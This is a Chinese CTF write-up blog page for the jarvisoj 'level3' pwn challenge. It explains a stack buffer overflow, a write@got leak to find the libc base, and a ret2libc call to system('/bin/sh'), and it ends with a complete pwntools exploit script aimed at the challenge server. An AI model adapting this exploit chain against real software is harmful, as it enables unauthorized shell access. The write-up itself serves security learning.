<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="pwn,二进制,exp," />










<meta name="description" content="漏洞read函数没有限制输入的长度，存在栈溢出。 计算栈溢出偏移量关键点：sub  esp,88h        lea  eax,[ebp+buf]ida说eax是read函数的buf，所以偏移量就是0x88，我们需要覆盖的是ret地址，中间还隔了一个ebp，所以padding为0x88+4。 计算libc偏移量由于是动态链接库，每次加载的基址都不一样，所以需要使用write泄露出某个libc函">
<meta name="keywords" content="pwn,二进制,exp">
<meta property="og:type" content="article">
<meta property="og:title" content="jarvisoj_xman3">
<meta property="og:url" content="http://yoursite.com/2019/05/09/jarvisoj-xman3/index.html">
<meta property="og:site_name" content="Ice_bag的技术博客，欢迎！">
<meta property="og:description" content="漏洞read函数没有限制输入的长度，存在栈溢出。 计算栈溢出偏移量关键点：sub  esp,88h        lea  eax,[ebp+buf]ida说eax是read函数的buf，所以偏移量就是0x88，我们需要覆盖的是ret地址，中间还隔了一个ebp，所以padding为0x88+4。 计算libc偏移量由于是动态链接库，每次加载的基址都不一样，所以需要使用write泄露出某个libc函">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://yoursite.com/2019/05/09/jarvisoj-xman3/1.png">
<meta property="og:image" content="http://yoursite.com/2019/05/09/jarvisoj-xman3/2.png">
<meta property="og:updated_time" content="2019-05-09T16:43:10.880Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="jarvisoj_xman3">
<meta name="twitter:description" content="漏洞read函数没有限制输入的长度，存在栈溢出。 计算栈溢出偏移量关键点：sub  esp,88h        lea  eax,[ebp+buf]ida说eax是read函数的buf，所以偏移量就是0x88，我们需要覆盖的是ret地址，中间还隔了一个ebp，所以padding为0x88+4。 计算libc偏移量由于是动态链接库，每次加载的基址都不一样，所以需要使用write泄露出某个libc函">
<meta name="twitter:image" content="http://yoursite.com/2019/05/09/jarvisoj-xman3/1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/05/09/jarvisoj-xman3/"/>





  <title>jarvisoj_xman3 | Ice_bag的技术博客，欢迎！</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Ice_bag的技术博客，欢迎！</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">keen on hack and geek :~)</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/关于我" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/标签" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/文章分类" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-sitemap">
          <a href="/sitemap.xml" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br />
            
            站点地图
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/05/09/jarvisoj-xman3/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Ice_bag(WXJ)">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Ice_bag的技术博客，欢迎！">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">jarvisoj_xman3</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-05-09T22:49:57+08:00">
                2019-05-09
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/pwn/" itemprop="url" rel="index">
                    <span itemprop="name">pwn</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="漏洞"><a href="#漏洞" class="headerlink" title="漏洞"></a>漏洞</h1><p>read函数没有限制输入的长度，存在栈溢出。</p>
<h1 id="计算栈溢出偏移量"><a href="#计算栈溢出偏移量" class="headerlink" title="计算栈溢出偏移量"></a>计算栈溢出偏移量</h1><p><img src="/2019/05/09/jarvisoj-xman3/1.png" alt="ida反汇编"><br>关键点：sub  esp,88h<br>        lea  eax,[ebp+buf]<br>ida说eax是read函数的buf，所以偏移量就是0x88，我们需要覆盖的是ret地址，中间还隔了一个ebp，所以padding为0x88+4。</p>
<h1 id="计算libc偏移量"><a href="#计算libc偏移量" class="headerlink" title="计算libc偏移量"></a>计算libc偏移量</h1><p>由于是动态链接库，每次加载的基址都不一样，所以需要使用write泄露出某个libc函数的真实地址，再根据库中函数相当位置相同<br>推算出别的库函数的实际地址。</p>
<h2 id="write函数"><a href="#write函数" class="headerlink" title="write函数"></a>write函数</h2><p>三个参数，通过栈传递，分别为：nbytes,buf,fd。在栈中的顺序大概是这样：</p>
<pre><code>| 栈顶 |
|  fd  |
|  buf |
|nbytes|
</code></pre><p>因此，我们要伪造的泄露write地址的栈帧为：</p>
<pre><code>|   栈顶   |
| write@plt|
|return_add|
|    1     |
|write@got |
|    4     |
</code></pre><p>接下来程序输出的就是write的真实地址</p>
<h2 id="ELF"><a href="#ELF" class="headerlink" title="ELF."></a>ELF.</h2><p>pwntools中的计算基址的神器，用法：<br>    ELF(“二进制文件路径”)<br>    ELF.symbols[‘’] 查看函数地址<br>    ELF.plt[‘’]同上<br>    ELF.got[‘’]同上<br>libcsearcher模块：<br>    libc.search(‘’)在库中寻找</p>
<h2 id="基址偏移公式"><a href="#基址偏移公式" class="headerlink" title="基址偏移公式"></a>基址偏移公式</h2><p>write真实地址-write在libc中的地址=偏移量</p>
<h2 id="return-addr"><a href="#return-addr" class="headerlink" title="return_addr"></a>return_addr</h2><p>计算到了偏移量，我们还不能停，因为重新加载程序会生成一个新的偏移量，所以这时我们要劫持程序<br>流程，再次进入vuln函数，所以return_add填入vuln的地址，再入vuln函数，再次栈溢出。</p>
<h1 id="getshell"><a href="#getshell" class="headerlink" title="getshell"></a>getshell</h1><p>得到偏移量后，根据各函数在libc中的地址，我们很容易就能算出真实地址，接下来只需要调用system(/bin/sh)就完事了<br>system就一个参数，所以伪造的栈帧为：</p>
<pre><code>|   栈顶   |
|return_add|
|  bin_add |
</code></pre><p>由于执行完就getshell了，所以return_addr瞎填就行，只要是四个字节。<br><img src="/2019/05/09/jarvisoj-xman3/2.png" alt="getsh"></p>
<h1 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h1><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> LibcSearcher</span><br><span class="line"><span class="comment">#context.log_level='debug'</span></span><br><span class="line"></span><br><span class="line">level3=ELF(<span class="string">'./level3'</span>)</span><br><span class="line">vuln=level3.symbols[<span class="string">'vulnerable_function'</span>]</span><br><span class="line">write_plt=level3.plt[<span class="string">'write'</span>]</span><br><span class="line"><span class="comment">#libc=ELF('/lib/i386-linux-gnu/libc.so.6')</span></span><br><span class="line">libc=ELF(<span class="string">'./libc-2.19.so'</span>)</span><br><span class="line">write_got=level3.got[<span class="string">'write'</span>]</span><br><span class="line">p=remote(<span class="string">'pwn2.jarvisoj.com'</span>,<span class="number">9879</span>)</span><br><span class="line"><span class="comment">#p=process('./level3')</span></span><br><span class="line">p.recvline()</span><br><span class="line">p.sendline(<span class="string">'a'</span>*<span class="number">140</span>+p32(write_plt)+p32(vuln)+p32(<span class="number">1</span>)+p32(write_got)+p32(<span class="number">4</span>))</span><br><span class="line">write=u32(p.recv(<span class="number">4</span>))</span><br><span class="line"></span><br><span class="line">offset=write-libc.symbols[<span class="string">'write'</span>]</span><br><span class="line">system=offset+libc.symbols[<span class="string">'system'</span>]</span><br><span class="line">bin_sh=offset+libc.search(<span class="string">'/bin/sh'</span>).next()</span><br><span class="line">p.sendline(<span class="string">'a'</span>*<span class="number">140</span>+p32(system)+<span class="string">'aaaa'</span>+p32(bin_sh))</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/pwn/" rel="tag"># pwn</a>
          
            <a href="/tags/二进制/" rel="tag"># 二进制</a>
          
            <a href="/tags/exp/" rel="tag"># exp</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/04/26/二进制学习/" rel="next" title="二进制学习">
                <i class="fa fa-chevron-left"></i> 二进制学习
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/06/02/X64-ret2libc/" rel="prev" title="X64_ret2libc">
                X64_ret2libc <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Ice_bag(WXJ)</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">27</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/文章分类/index.html">
                  <span class="site-state-item-count">10</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/标签/index.html">
                  <span class="site-state-item-count">14</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#漏洞"><span class="nav-number">1.</span> <span class="nav-text">漏洞</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#计算栈溢出偏移量"><span class="nav-number">2.</span> <span class="nav-text">计算栈溢出偏移量</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#计算libc偏移量"><span class="nav-number">3.</span> <span class="nav-text">计算libc偏移量</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#write函数"><span class="nav-number">3.1.</span> <span class="nav-text">write函数</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ELF"><span class="nav-number">3.2.</span> <span class="nav-text">ELF.</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#基址偏移公式"><span class="nav-number">3.3.</span> <span class="nav-text">基址偏移公式</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#return-addr"><span class="nav-number">3.4.</span> <span class="nav-text">return_addr</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#getshell"><span class="nav-number">4.</span> <span class="nav-text">getshell</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#exp"><span class="nav-number">5.</span> <span class="nav-text">exp</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Ice_bag(WXJ)</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
